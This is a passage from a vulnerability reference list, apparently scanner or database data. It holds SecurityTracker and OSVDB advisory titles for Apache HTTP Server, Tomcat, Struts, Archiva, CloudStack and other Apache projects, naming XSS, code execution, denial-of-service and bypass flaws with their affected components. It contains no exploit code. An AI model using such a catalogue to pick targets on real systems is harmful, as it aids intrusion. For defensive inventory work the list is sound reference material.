17524| [1025993] Apache Tomcat AJP Protocol Processing Bug Lets Remote Users Bypass Authentication or Obtain Information
17525| [1025976] Apache Wicket Input Validation Flaw Permits Cross-Site Scripting Attacks
17526| [1025960] Apache httpd Byterange Filter Processing Error Lets Remote Users Deny Service
17527| [1025925] Apache Tomcat Commons Daemon jsvc Lets Local Users Gain Elevated Privileges
17528| [1025924] Apache Tomcat XML Validation Flaw Lets Applications Obtain Potentially Sensitive Information
17529| [1025788] Apache Tomcat Lets Malicious Applications Obtain Information and Deny Service
17530| [1025755] Apache Santuario Buffer Overflow Lets Remote Users Deny Service
17531| [1025712] Apache Tomcat Discloses Passwords to Local Users in Certain Cases
17532| [1025577] Apache Archiva Input Validation Hole Permits Cross-Site Scripting Attacks
17533| [1025576] Apache Archiva Request Validation Flaw Permits Cross-Site Request Forgery Attacks
17534| [1025527] Apache APR Library apr_fnmatch() Flaw Lets Remote Users Execute Arbitrary Code
17535| [1025303] Apache Tomcat HTTP BIO Connector Error Discloses Information From Different Requests to Remote Users
17536| [1025215] Apache Tomcat May Ignore @ServletSecurity Annotation Protections
17537| [1025066] Apache Continuum Input Validation Flaw Permits Cross-Site Request Forgery Attacks
17538| [1025065] Apache Continuum Input Validation Hole Permits Cross-Site Scripting Attacks
17539| [1025027] Apache Tomcat maxHttpHeaderSize Parsing Error Lets Remote Users Deny Service
17540| [1025026] Apache Tomcat Manager Input Validation Hole Permits Cross-Site Scripting Attacks
17541| [1025025] Apache Tomcat Security Manager Lets Local Users Bypass File Permissions
17542| [1024764] Apache Tomcat Manager Input Validation Hole in 'sessionList.jsp' Permits Cross-Site Scripting Attacks
17543| [1024417] Apache Traffic Server Insufficient Randomization Lets Remote Users Poison the DNS Cache
17544| [1024332] Apache mod_cache and mod_dav Request Processing Flaw Lets Remote Users Deny Service
17545| [1024180] Apache Tomcat 'Transfer-Encoding' Header Processing Flaw Lets Remote Users Deny Service and Obtain Potentially Sensitive Information
17546| [1024096] Apache mod_proxy_http May Return Results for a Different Request
17547| [1023942] Apache mod_proxy_ajp Error Condition Lets Remote Users Deny Service
17548| [1023941] Apache ap_read_request() Memory Error May Let Remote Users Access Potentially Sensitive Information
17549| [1023778] Apache ActiveMQ Input Validation Flaw Permits Cross-Site Scripting Attacks
17550| [1023701] Apache mod_isapi Error Processing Flaw May Let Remote Users Deny Service
17551| [1023533] Apache mod_proxy Integer Overflow May Let Remote Users Execute Arbitrary Code
17552| [1022988] Apache Solaris Support Code Bug Lets Remote Users Deny Service
17553| [1022529] Apache mod_deflate Connection State Bug Lets Remote Users Deny Service
17554| [1022509] Apache mod_proxy stream_reqbody_cl() Infinite Loop Lets Remote Users Deny Service
17555| [1022296] Apache IncludesNoExec Options Restrictions Can Be Bypass By Local Users
17556| [1022264] Apache mod_proxy_ajp Bug May Disclose Another User's Response Data
17557| [1022001] Apache Tomcat mod_jk May Disclose Responses to the Wrong User
17558| [1021988] mod_perl Input Validation Flaw in Apache::Status and Apache2::Status Permits Cross-Site Scripting Attacks
17559| [1021350] NetWare Bug Lets Remote Users Access the ApacheAdmin Console
17560| [1020635] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
17561| [1020520] Oracle WebLogic Apache Connector Lets Remote Users Execute Arbitrary Code
17562| [1020267] Apache mod_proxy Interim Response Process Bug Lets Remote Users Deny Service
17563| [1019784] Apache-SSL Certificate Processing Bug May Let Remote Users View Portions of Kernel Memory
17564| [1019256] Apache mod_negotiation Input Validation Hole Permits Cross-Site Scripting Attacks
17565| [1019194] Apache Input Validation Hole in Mod_AutoIndex When the Character Set is Undefined May Permit Cross-Site Scripting Attacks
17566| [1019185] Apache Input Validation Hole in mod_proxy_ftp Permits Cross-Site Scripting Attacks
17567| [1019154] Apache Input Validation Hole in mod_status Permits Cross-Site Scripting Attacks
17568| [1019093] Apache Input Validation Hole in mod_imap Permits Cross-Site Scripting Attacks
17569| [1019030] Apache Input Validation Hole in Default HTTP 413 Error Page Permits Cross-Site Scripting Attacks
17570| [1018633] Apache mod_proxy Bug Lets Remote Users Deny Service
17571| [1018304] Apache HTTPD scoreboard Protection Flaw Lets Local Users Terminate Arbitrary Processes
17572| [1018303] Apache HTTPD mod_cache May Let Remote Users Deny Service
17573| [1018302] Apache mod_status Input Validation Hole Permits Cross-Site Scripting Attacks
17574| [1018269] Apache Tomcat Input Validation Hole in Processing Accept-Language Header Permits Cross-Site Scripting Attacks
17575| [1017904] Apache suEXEC Bugs May Let Local Users Gain Elevated Privileges
17576| [1017719] Apache Tomcat JK Web Server Connector Buffer Overflow in map_uri_to_worker() Lets Remote Users Execute Arbitrary Code
17577| [1017062] Apache mod_tcl Format String Bug in set_var() Function May Let Remote Users Execute Arbitrary Code
17578| [1016601] Apache mod_rewrite Off-by-one Error Lets Remote Users Execute Arbitrary Code
17579| [1016576] Apache Tomcat Discloses Directory Listings to Remote Users
17580| [1015447] Apache mod_ssl Null Pointer Dereference May Let Remote Users Deny Service
17581| [1015344] Apache mod_imap Input Validation Flaw in Referer Field Lets Remote Users Conduct Cross-Site Scripting Attacks
17582| [1015093] Apache Memory Leak in MPM 'worker.c' Code May Let Remote Users Deny Service
17583| [1014996] ApacheTop Unsafe Temporary File May Let Local Users Gain Elevated Privileges
17584| [1014833] Apache ssl_hook_Access() Function May Fail to Verify Client Certificates
17585| [1014826] Apache Memory Leak in 'byterange filter' Lets Remote Users Deny Service
17586| [1014575] Apache mod_ssl Off-by-one Buffer Overflow in Processing CRLs May Let Remote Users Deny Service
17587| [1014323] Apache Chunked Transfer-Encoding and Content-Length Processing Lets Remote Users Smuggle HTTP Requests
17588| [1013156] Apache mod_python Publisher Handler Discloses Information to Remote Users
17589| [1012829] Apache mod_auth_radius radcpy() Integer Overflow Lets Remote Users Deny Service in Certain Cases
17590| [1012416] Apache on Apple OS X Lets Remote Users Bypass Apache File Handlers and Directly Access Files
17591| [1012415] Apache on Apple HFS+ Filesystems May Disclose '.DS_Store' Files to Remote Users
17592| [1012414] Apache mod_digest_apple Lets Remote Users Replay Authentication Credentials
17593| [1012083] Apache Web Server Error in Processing Requests With Many Space Characters Lets Remote Users Deny Service
17594| [1011783] Apache mod_include Buffer Overflow Lets Local Users Execute Arbitrary Code
17595| [1011557] Apache mod_ssl SSLCipherSuite Directive Can By Bypassed in Certain Cases
17596| [1011385] Apache Satsify Directive Error May Let Remote Users Access Restricted Resources
17597| [1011340] Apache SSL Connection Abort State Error Lets Remote Users Deny Service
17598| [1011303] Apache ap_resolve_env() Buffer Overflow in Reading Configuration Files May Let Local Users Gain Elevated Privileges
17599| [1011299] Apache IPv6 Address Parsing Flaw May Let Remote Users Deny Service
17600| [1011248] Apache mod_dav LOCK Method Error May Let Remote Users Deny Service
17601| [1011213] Apache mod_ssl Can Be Crashed By Remote Users When Reverse Proxying SSL Connections
17602| [1010674] Apache Can Be Crashed By PHP Code Invoking Nested Remote Sockets
17603| [1010599] Apache httpd Header Line Memory Allocation Lets Remote Users Crash the Server
17604| [1010462] Apache mod_proxy Buffer Overflow May Let Remote Users Execute Arbitrary Code
17605| [1010322] Apache mod_ssl Stack Overflow in ssl_util_uuencode_binary() May Let Remote Users Execute Arbitrary Code
17606| [1010270] cPanel Apache mod_phpsuexec Options Let Local Users Gain Elevated Privileges
17607| [1009934] Apache Web Server Has Buffer Overflow in ebcdic2ascii() on Older Processor Architectures
17608| [1009516] Apache mod_survey HTML Report Format Lets Remote Users Conduct Cross-Site Scripting Attacks
17609| [1009509] Apache mod_disk_cache Stores Authentication Credentials on Disk
17610| [1009495] Apache Web Server Socket Starvation Flaw May Let Remote Users Deny Service
17611| [1009417] GroupWise WebAccess With Apache on NetWare Has Configuration Flaw That May Grant Web Access to Remote Users
17612| [1009338] Apache mod_access Parsing Flaw May Fail to Enforce Allow/Deny Rules
17613| [1009337] Apache mod_ssl Memory Leak Lets Remote Users Crash the Daemon
17614| [1009182] Apache for Cygwin '..%5C' Input Validation Flaw Discloses Files to Remote Users
17615| [1008973] PHP May Apply Incorrect php_admin_* Settings To Requests for Apache Virtual Hosts
17616| [1008967] Apache-SSL 'SSLFakeBasicAuth' Lets Remote Users Forge Client Certificates to Be Authenticated
17617| [1008920] Apache mod_digest May Validate Replayed Client Responses
17618| [1008828] Apache mod_python String Processing Bug Still Lets Remote Users Crash the Web Server
17619| [1008822] Apache mod_perl File Descriptor Leak May Let Local Users Hijack the http and https Services
17620| [1008675] mod_auth_shadow Apache Module Authenticates Expired Passwords
17621| [1008559] Apache mod_php File Descriptor Leak May Let Local Users Hijack the https Service
17622| [1008335] Apache mod_python String Processing Bug Lets Remote Users Crash the Web Server
17623| [1008196] Apache 2.x on Windows May Return Unexpected Files For URLs Ending With Certain Characters
17624| [1008030] Apache mod_rewrite Contains a Buffer Overflow
17625| [1008029] Apache mod_alias Contains a Buffer Overflow
17626| [1008028] Apache mod_cgid May Disclose CGI Output to Another Client
17627| [1007995] Apache Cocoon Forms May Let Remote Users Execute Arbitrary Java Code on the System
17628| [1007993] Apache Cocoon 'view-source' Sample Script Discloses Files to Remote Users
17629| [1007823] Apache Web Server mod_cgi Error May Let Malicious CGI Scripts Crash the Web Service
17630| [1007664] Apache::Gallery Unsafe Temporary Files May Let Local Users Gain Apache Web Server Privileges
17631| [1007557] Apache Web Server Does Not Filter Terminal Escape Sequences From Log Files
17632| [1007230] Apache HTTP Server 'rotatelogs' Bug on Win32 and OS/2 May Cause the Logging to Stop
17633| [1007146] Apache HTTP Server FTP Proxy Bug May Cause Denial of Service Conditions
17634| [1007145] Apache 'accept()' Errors May Cause Denial of Service Conditions
17635| [1007144] Apache Web Server 'type-map' File Error Permits Local Denial of Service Attacks
17636| [1007143] Apache 2.0 Web Server May Use a Weaker Encryption Implementation Than Specified in Some Cases
17637| [1006864] Apache Web Server Can Be Crashed By Remote Users Via mod_dav Flaws and Also Via Basic Authentication
17638| [1006709] Apache mod_survey Input Validation Flaw Lets Remote Users Fill Up Disk Space
17639| [1006614] Apache mod_ntlm Buffer Overflow and Format String Flaw Let Remote Users Execute Arbitary Code
17640| [1006591] Apache mod_access_referer Module Null Pointer Dereference May Faciliate Denial of Service Attacks
17641| [1006444] Apache 2.0 Web Server Line Feed Buffer Allocation Flaw Lets Remote Users Deny Service
17642| [1006021] Apache Tomcat Server URL Parsing Error May Disclose Otherwise Inaccessible Web Directory Listings and Files to Remote Users
17643| [1005963] Apache Web Server 2.x Windows Device Access Flaw Lets Remote Users Crash the Server or Possibly Execute Arbitrary Code
17644| [1005962] Apache Web Server Path Parsing Flaw May Allow Remote Users to Execute Code in Certain Configurations
17645| [1005848] Apache 'printenv' Script Input Validation Bugs in Older Versions May Let Remote Users Conduct Cross-Site Scripting Attacks
17646| [1005765] Apache mod_jk Module Processing Bug When Used With Tomcat May Disclose Information to Remote Users or Crash
17647| [1005548] Apache mod_php Module May Allow Local Users to Gain Control of the Web Port
17648| [1005499] Apache Web Server (2.0.42) May Disclose CGI Source Code to Remote Users When Used With WebDAV
17649| [1005410] Apache Tomcat Java Servlet Engine Can Be Crashed Via Multiple Requests for DOS Device Names
17650| [1005351] Apache Web Server (1.3.x) Shared Memory Scoreboard Bug Lets Certain Local Users Issue Signals With Root Privileges
17651| [1005331] Apache Web Server (2.x) SSI Server Signature Filtering Hole Lets Remote Users Conduct Cross-Site Scripting Attacks
17652| [1005290] Apache Tomcat Java Server Default Servlet Returns JSP Source Code to Remote Users
17653| [1005285] Apache Web Server 'mod_dav' Has Null Pointer Bug That May Allow Remote Users to Cause Denial of Service Conditions
17654| [1005010] Apache Web Server (2.0) Has Unspecified Flaw That Allows Remote Users to Obtain Sensitive Data and Cause Denial of Service Conditions
17655| [1004770] Apache 2.x Web Server ap_log_rerror() Function May Disclose Full Installation Path to Remote Users
17656| [1004745] Apache Tomcat Java Server Allows Cross-Site Scripting Attacks
17657| [1004636] Apache mod_ssl 'Off-by-One' Bug May Let Local Users Crash the Web Server or Possibly Execute Arbitrary Code
17658| [1004602] Apache Tomcat Java Server for Windows Can Be Crashed By Remote Users Sending Malicious Requests to Hang All Available Working Threads
17659| [1004586] Apache Tomcat Java Server May Disclose the Installation Path to Remote Users
17660| [1004555] Apache Web Server Chunked Encoding Flaw May Let Remote Users Execute Arbitrary Code on the Server
17661| [1004209] Apache 'mod_python' Python Language Interpreter Bug in Publisher Handler May Allow Remote Users to Modify Files on the System
17662| [1003874] Apache Web Server for Windows Has Batch File Processing Hole That Lets Remote Users Execute Commands on the System
17663| [1003767] 'mod_frontpage' Module for Apache Web Server Has Buffer Overlow in 'fpexec.c' That Allows Remote Users to Execute Arbitrary Code on the System with Root Privileges
17664| [1003723] Apache-SSL for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
17665| [1003664] 'mod_ssl' Security Package for Apache Web Server Has Buffer Overflow That Can Be Triggered By Remote Users
17666| [1003602] GNUJSP Java Server Pages Implementation Discloses Web Files and Source Code to Remote Users and Bypasses Apache Access Control Restrictions
17667| [1003465] PHP for Apache Web Server May Disclose Installation Path Information to Remote Users Making 'OPTIONS' Requests
17668| [1003451] Oracle Application Server PL/SQL Module for Apache Has Buffer Overflows That Allow Remote Users to Execute Arbitrary Code and Gain Access to the Server
17669| [1003131] Apache Web Server in Virtual Hosting Mode Can Be Crashed By a Local User Removing a Log Directory
17670| [1003104] PHP.EXE Windows CGI for Apache Web Server May Let Remote Users View Files on the Server Due to Configuration Error
17671| [1003008] Apache 'mod_bf' Module Lets Remote Users Execute Arbitrary Code
17672| [1002629] Apache suEXEC Wrapper Fails to Observe Minimum Group ID Security Settings in Certain Situations
17673| [1002542] Apache Web Server Virtual Hosting Split-Logfile Function Lets Remote Users Write Log Entries to Arbitrary Files on the System
17674| [1002400] Apache mod_gzip Module Has Buffer Overflow That Can Be Exploited By Local Users to Gain Elevated Privileges
17675| [1002303] Several 3rd Party Apache Authentication Modules Allow Remote Users to Execute Arbitrary Code to Gain Access to the System or Execute Stored Procedures to Obtain Arbitrary Database Information
17676| [1002188] Apache Web Server Discloses Internal IP Addresses to Remote Users in Certain Configurations
17677| [1001989] Apache Web Server May Disclose Directory Contents Even If an Index.html File is Present in the Directory
17678| [1001719] Apache Web Server on Mac OS X Client Fails to Enforce File and Directory Access Protections, Giving Remote Users Access to Restricted Pages
17679| [1001572] Apache Web Server on Microsoft Windows Platforms Allows Remote Users to Crash the Web Server
17680| [1001304] Apache Web Server for Windows Lets Remote Users Crash the Web Server Application
17681| [1001083] Apache Web Server May Display Directory Index Listings Even if Directory Listings Are Disabled
17682|
17683| OSVDB - http://www.osvdb.org:
17684| [96078] Apache CloudStack Infrastructure Menu Setup Network Multiple Field XSS
17685| [96077] Apache CloudStack Global Settings Multiple Field XSS
17686| [96076] Apache CloudStack Instances Menu Display Name Field XSS
17687| [96075] Apache CloudStack Instances Menu Add Instances Network Name Field XSS
17688| [96074] Apache CloudStack Instances Menu Add Instances Review Step Multiple Field XSS
17689| [96031] Apache HTTP Server suEXEC Symlink Arbitrary File Access
17690| [95888] Apache Archiva Single / Double Quote Character Handling XSS Weakness
17691| [95885] Apache Subversion mod_dav_svn Module Crafted HTTP Request Handling Remote DoS
17692| [95706] Apache OpenOffice.org (OOo) OOXML Document File XML Element Handling Memory Corruption
17693| [95704] Apache OpenOffice.org (OOo) DOC File PLCF Data Handling Memory Corruption
17694| [95603] Apache Continuum web/util/GenerateRecipentNotifier.java recipient Parameter XSS
17695| [95602] Apache Continuum web/action/notifier/JabberProjectNotifierEditAction-jabberProjectNotifierSave-validation.xml Multiple Parameter XSS
17696| [95601] Apache Continuum web/action/notifier/JabberGroupNotifierEditAction-jabberProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
17697| [95600] Apache Continuum web/action/ScheduleAction-saveSchedule-validation.xml Multiple Parameter XSS
17698| [95599] Apache Continuumweb/action/BuildDefinitionAction-saveBuildDefinition-validation.xml Multiple Parameter XSS
17699| [95598] Apache Continuum web/action/AddProjectAction-addProject-validation.xml Multiple Parameter XSS
17700| [95597] Apache Continuum web/action/ProjectEditAction-projectSave-validation.xml Multiple Parameter XSS
17701| [95596] Apache Continuum web/action/notifier/IrcGroupNotifierEditAction-ircProjectGroupNotifierSave-validation.xml Multiple Parameter XSS
17702| [95595] Apache Continuum web/action/notifier/IrcProjectNotifierEditAction-ircProjectNotifierSave-validation.xml Multiple Parameter XSS
17703| [95594] Apache Continuum web/action/ProjectGroupAction.java Multiple Parameter XSS
17704| [95593] Apache Continuum web/action/AddProjectGroupAction.java Multiple Parameter XSS
17705| [95592] Apache Continuum web/action/AddProjectAction.java Multiple Parameter XSS
17706| [95523] Apache OFBiz Webtools Application View Log Screen Unspecified XSS
17707| [95522] Apache OFBiz Nested Expression Evaluation Arbitrary UEL Function Execution
17708| [95521] Apache HTTP Server mod_session_dbd Session Saving Unspecified Issue
17709| [95498] Apache HTTP Server mod_dav.c Crafted MERGE Request Remote DoS
17710| [95406] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Arbitrary Site Redirect
17711| [95405] Apache Struts DefaultActionMapper Multiple Prefixing Parameters Remote Code Execution
17712| [95011] Apache CXF XML Parser SOAP Message Handling CPU Resource Exhaustion Remote DoS
17713| [94705] Apache Geronimo RMI Classloader Exposure Serialized Object Handling Remote Code Execution
17714| [94651] Apache Santuario (XML Security for C++) XML Signature CanonicalizationMethod Parameter Spoofing Weakness
17715| [94636] Apache Continuum workingCopy.action userDirectory Traversal Arbitrary File Access
17716| [94635] Apache Maven SCM SvnCommandlineUtils Process Listing Local Password Disclosure
17717| [94632] Apache Maven Wagon SSH (wagon-ssh) Host Verification Failure MitM Weakness
17718| [94625] Apache Santuario (XML Security for C++) XML Signature Reference Crafted XPointer Expression Handling Heap Buffer Overflow
17719| [94618] Apache Archiva /archiva/security/useredit.action username Parameter XSS
17720| [94617] Apache Archiva /archiva/security/roleedit.action name Parameter XSS
17721| [94616] Apache Archiva /archiva/security/userlist!show.action roleName Parameter XSS
17722| [94615] Apache Archiva /archiva/deleteArtifact!doDelete.action groupId Parameter XSS
17723| [94614] Apache Archiva /archiva/admin/addLegacyArtifactPath!commit.action legacyArtifactPath.path Parameter XSS
17724| [94613] Apache Archiva /archiva/admin/addRepository.action Multiple Parameter XSS
17725| [94612] Apache Archiva /archiva/admin/editAppearance.action Multiple Parameter XSS
17726| [94611] Apache Archiva /archiva/admin/addLegacyArtifactPath.action Multiple Parameter XSS
17727| [94610] Apache Archiva /archiva/admin/addNetworkProxy.action Multiple Parameter XSS
17728| [94403] Apache Santuario (XML Security for C++) InclusiveNamespace PrefixList Processing Heap Overflow
17729| [94402] Apache Santuario (XML Security for C++) HMAC-based XML Signature Processing DoS
17730| [94401] Apache Santuario (XML Security for C++) XPointer Evaluation Stack Overflow
17731| [94400] Apache Santuario (XML Security for C++) HMAC-Based XML Signature Reference Element Validation Spoofing Weakness
17732| [94279] Apache Qpid CA Certificate Validation Bypass
17733| [94275] Apache Solr JettySolrRunner.java Can Not Find Error Message XSS
17734| [94233] Apache OpenJPA Object Deserialization Arbitrary Executable Creation
17735| [94042] Apache Axis JAX-WS Java Unspecified Exposure
17736| [93969] Apache Struts OGNL Expression Handling Double Evaluation Error Remote Command Execution
17737| [93796] Apache Subversion Filename Handling FSFS Repository Corruption Remote DoS
17738| [93795] Apache Subversion svnserve Server Aborted Connection Message Handling Remote DoS
17739| [93794] Apache Subversion contrib/hook-scripts/check-mime-type.pl svnlook Hyphenated argv Argument Handling Remote DoS
17740| [93793] Apache Subversion contrib/hook-scripts/svn-keyword-check.pl Filename Handling Remote Command Execution
17741| [93646] Apache Struts Crafted Parameter Arbitrary OGNL Code Execution
17742| [93645] Apache Struts URL / Anchor Tag includeParams Attribute Remote Command Execution
17743| [93636] Apache Pig Multiple Physical Operator Memory Exhaustion Remote Remote DoS
17744| [93635] Apache Wink DTD (Document Type Definition) Expansion Data Parsing Information Disclosure
17745| [93605] RT Apache::Session::File Session Replay Reuse Information Disclosure
17746| [93599] Apache Derby SYSCS_UTIL.SYSCS_SET_DATABASE_PROPERTY Boot Password Manipulation Re-encryption Failure Password Corruption
17747| [93555] Apache Commons Codec Invalid Base32 String Information Tunneling Weakness
17748| [93554] Apache HBase bulkLoadHFiles() Method ACL Bypass
17749| [93543] JBoss Enterprise Application Platform org.apache.catalina.connector.Response.encodeURL() Method MitM jsessionid Disclosure
17750| [93542] Apache ManifoldCF (Connectors Framework) org.apache.manifoldcf.crawler.ExportConfiguration Class Configuration Export Password Disclosure
17751| [93541] Apache Solr json.wrf Callback XSS
17752| [93524] Apache Hadoop GetSecurityDescriptorControl() Function Absolute Security Descriptor Handling NULL Descriptor Weakness
17753| [93521] Apache jUDDI Security API Token Session Persistence Weakness
17754| [93520] Apache CloudStack Default SSL Key Weakness
17755| [93519] Apache Shindig /ifr Cross-site Arbitrary Gadget Invocation
17756| [93518] Apache Solr /admin/analysis.jsp name Parameter XSS
17757| [93517] Apache CloudStack setup-cloud-management /etc/sudoers Modification Local Privilege Escalation
17758| [93516] Apache CXF UsernameTokenInterceptor Nonce Caching Replay Weakness
17759| [93515] Apache HBase table.jsp name Parameter XSS
17760| [93514] Apache CloudStack Management Server Unauthenticated Remote JMX Connection Default Setting Weakness
17761| [93463] Apache Struts EL / OGNL Interpretation Unspecified Remote Code Execution
17762| [93462] Apache CXF WS-SecurityPolicy AlgorithmSuite Arbitrary Ciphertext Decryption Weakness
17763| [93401] Apache Hadoop core-site.xml Permission Weakness Local Alfredo Secret Disclosure
17764| [93400] Apache Hadoop Map/Reduce Job Log Directory Symlink Arbitrary File Mode Manipulation
17765| [93397] Apache Wicket Referrer HTTP Header Session ID Disclosure
17766| [93366] Apache HTTP Server modules/mappers/mod_rewrite.c do_rewritelog() Function Log File Terminal Escape Sequence Filtering Remote Command Execution
17767| [93254] Apache Tomcat AsyncListener Method Cross-session Information Disclosure
17768| [93253] Apache Tomcat Chunked Transfer Encoding Data Saturation Remote DoS
17769| [93252] Apache Tomcat FORM Authenticator Session Fixation
17770| [93172] Apache Camel camel/endpoints/ Endpoint XSS
17771| [93171] Apache Sling HtmlResponse Error Message XSS
17772| [93170] Apache Directory DelegatingAuthenticator MitM Spoofing Weakness
17773| [93169] Apache Wave AuthenticationServlet.java Session Fixation Weakness
17774| [93168] Apache Click ErrorReport.java id Parameter XSS
17775| [93167] Apache ActiveMQ JMSXUserId Spoofing Weakness
17776| [93166] Apache CXF Crafted Message Element Count Handling System Resource Exhaustion Remote DoS
17777| [93165] Apache CXF Crafted Message Element Level Handling System Resource Exhaustion Remote DoS
17778| [93164] Apache Harmony DatagramSocket Class connect Method CheckAccept() IP Blacklist Bypass
17779| [93163] Apache Hadoop Map/Reduce Daemon Symlink Arbitrary File Overwrite
17780| [93162] Apache VelocityStruts struts/ErrorsTool.getMsgs Error Message XSS
17781| [93161] Apache CouchDB Rewriter VM Atom Table Memory Exhaustion Remote DoS
17782| [93158] Apache Wicket BookmarkablePageLink Feature XSS CSRF
17783| [93157] Apache Struts UrlHelper.java s:url includeParams Functionality XSS
17784| [93156] Apache Tapestry Calendar Component datefield.js datefield Parameter XSS
17785| [93155] Apache Struts fielderror.ftl fielderror Parameter Error Message XSS
17786| [93154] Apache JSPWiki Edit.jsp createPages WikiPermission Bypass
17787| [93153] Apache PDFBox PDFXrefStreamParser Missing Element Handling PDF Parsing DoS
17788| [93152] Apache Hadoop HttpServer.java Multiple Function XSS
17789| [93151] Apache Shiro Search Filter userName Parameter LDAP Code Injection Weakness
17790| [93150] Apache Harmony java.net.SocketPermission Class boolean equals Function checkConnect() Weakness Host Name Retrieval
17791| [93149] Apache Harmony java.security.Provider Class void load Function checkSecurityAccess() Weakness
17792| [93148] Apache Harmony java.security.ProtectionDomain Class java.lang.String.toString() Function checkPermission() Weakness
17793| [93147] Apache Harmony java.net.URLConnection openConnection Function checkConnect Weakness Proxy Connection Permission Bypass
17794| [93146] Apache Harmony java.net.ServerSocket Class void implAccept Function checkAccept() Weakness SerSocket Subclass Creation
17795| [93145] Apache Qpid JMS Client Detached Session Frame Handling NULL Pointer Dereference Remote DoS
17796| [93144] Apache Solr Admin Command Execution CSRF
17797| [93009] Apache VCL XMLRPC API Unspecified Function Remote Privilege Escalation
17798| [93008] Apache VCL Web GUI Unspecified Remote Privilege Escalation
17799| [92997] Apache Commons Codec org.apache.commons.codec.net.URLCodec Fields Missing 'final' Thread-safety Unspecified Issue
17800| [92976] Apache ActiveMQ scheduled.jsp crontab Command XSS
17801| [92947] Apache Commons Codec org.apache.commons.codec.language.Soundex.US_ENGLISH_MAPPING Missing MS_PKGPROTECT Field Manipulation Unspecified Issue
17802| [92749] Apache CloudStack Predictable Hash Virtual Machine Console Console Access URL Generation
17803| [92748] Apache CloudStack VM Console Access Restriction Bypass
17804| [92709] Apache ActiveMQ Web Console Unauthenticated Remote Access
17805| [92708] Apache ActiveMQ Sample Web Application Broker Resource Consumption Remote DoS
17806| [92707] Apache ActiveMQ webapp/websocket/chat.js Subscribe Message XSS
17807| [92706] Apache ActiveMQ Debug Log Rendering XSS
17808| [92705] Apache ActiveMQ PortfolioPublishServlet.java refresh Parameter XSS
17809| [92270] Apache Tomcat Unspecified CSRF
17810| [92094] Apache Subversion mod_dav_svn Module Nonexistent URL Lock Request Handling NULL Pointer Dereference Remote DoS
17811| [92093] Apache Subversion mod_dav_svn Module Activity URL PROPFIND Request Handling NULL Pointer Dereference Remote DoS
17812| [92092] Apache Subversion mod_dav_svn Module Log REPORT Request Handling NULL Pointer Dereference Remote DoS
17813| [92091] Apache Subversion mod_dav_svn Module Node Property Handling Resource Exhaustion Remote DoS
17814| [92090] Apache Subversion mod_dav_svn Module Activity URL Lock Request Handling NULL Pointer Dereference Remote DoS
17815| [91774] Apache Commons Codec Unspecified Non-private Field Manipulation Weakness
17816| [91628] mod_ruid2 for Apache HTTP Server fchdir() Inherited File Descriptor chroot Restriction Bypass
17817| [91328] Apache Wicket $up$ Traversal Arbitrary File Access
17818| [91295] Apple Mac OS X Apache Unicode Character URI Handling Authentication Bypass
17819| [91235] Apache Rave /app/api/rpc/users/get User Object Hashed Password Remote Disclosure
17820| [91185] Munin Default Apache Configuration Permission Weakness Remote Information Disclosure
17821| [91173] Apache Wicket WebApplicationPath Constructor Bypass /WEB-INF/ Directory File Access
17822| [91172] Apache Wicket PackageResourceGuard File Extension Filter Bypass
17823| [91025] Apache Qpid qpid::framing::Buffer Class Multiple Method Out-of-bounds Access Remote DoS
17824| [91024] Apache Qpid federation_tag Attribute Handling Federated Interbroker Link Access Restriction Bypass
17825| [91023] Apache Qpid AMQP Type Decoder Exposure Array Size Value Handling Memory Consumption Remote DoS
17826| [91022] Apache Qpid qpid/cpp/include/qpid/framing/Buffer.h qpid::framing::Buffer::checkAvailable() Function Integer Overflow
17827| [90986] Apache Jena ARQ INSERT DATA Request Handling Overflow
17828| [90907] Apache Subversion mod_dav_svn / libsvn_fs svn_fs_file_length() Function MKACTIVITY / PROPFIND Option Request Handling Remote DoS
17829| [90906] Apache Commons FileUpload /tmp Storage Symlink Arbitrary File Overwrite
17830| [90864] Apache Batik 1xx Redirect Script Origin Restriction Bypass
17831| [90858] Apache Ant Malformed TAR File Handling Infinite Loop DoS
17832| [90852] Apache HTTP Server for Debian apachectl /var/lock Permission Weakness Symlink Directory Permission Manipulation
17833| [90804] Apache Commons CLI Path Subversion Local Privilege Escalation
17834| [90802] Apache Avro Recursive Schema Handling Infinite Recursion DoS
17835| [90592] Apache Batik ApplicationSecurityEnforcer.java Multiple Method Security Restriction Bypass
17836| [90591] Apache Batik XML External Entity (XXE) Data Parsing Arbitrary File Disclosure
17837| [90565] Apache Tomcat Log Directory Permission Weakness Local Information Disclosure
17838| [90564] Apache Maven / Maven Wagon SSL Certificate Validation MitM Spoofing Weakness
17839| [90557] Apache HTTP Server mod_proxy_balancer balancer-manager Interface Multiple Parameter XSS
17840| [90556] Apache HTTP Server Multiple Module Multiple Parameter XSS
17841| [90276] Apache Axis2 axis2.xml Plaintext Password Local Disclosure
17842| [90249] Apache Axiom ClassLoader XMLInputFactory / XMLOutputFactory Construction Unspecified Issue
17843| [90235] Apache Commons HttpClient Certificate Wildcard Matching Weakness
17844| [90079] Apache CXF WSS4JInInterceptor URIMappingInterceptor WS-Security SOAP Service Access Restriction Bypass
17845| [90078] Apache CXF WS-SecurityPolicy Enabled Plaintext UsernameTokens Handling Authentication Bypass
17846| [89453] Apache Open For Business Project (OFBiz) Screenlet.title Widget Attribute XSS
17847| [89452] Apache Open For Business Project (OFBiz) Image.alt Widget Attribute XSS
17848| [89294] Apache CouchDB Futon UI Browser-based Test Suite Query Parameter XSS
17849| [89293] Apache CouchDB Unspecified Traversal Arbitrary File Access
17850| [89275] Apache HTTP Server mod_proxy_ajp Module Expensive Request Parsing Remote DoS
17851| [89267] Apache CouchDB JSONP Callback Handling Unspecified XSS
17852| [89146] Apache CloudStack Master Server log4j.conf SSH Private Key / Plaintext Password Disclosure
17853| [88603] Apache OpenOffice.org (OOo) Unspecified Information Disclosure
17854| [88602] Apache OpenOffice.org (OOo) Unspecified Manifest-processing Issue
17855| [88601] Apache OpenOffice.org (OOo) Unspecified PowerPoint File Handling Issue
17856| [88285] Apache Tomcat Partial HTTP Request Saturation Remote DoS
17857| [88095] Apache Tomcat NIO Connector Terminated Connection Infinte Loop DoS
17858| [88094] Apache Tomcat FORM Authentication Crafted j_security_check Request Security Constraint Bypass
17859| [88093] Apache Tomcat Null Session Requst CSRF Prevention Filter Bypass
17860| [88043] IBM Tivoli Netcool/Reporter Apache CGI Unspecified Remote Command Execution
17861| [87580] Apache Tomcat DIGEST Authentication Session State Caching Authentication Bypass Weakness
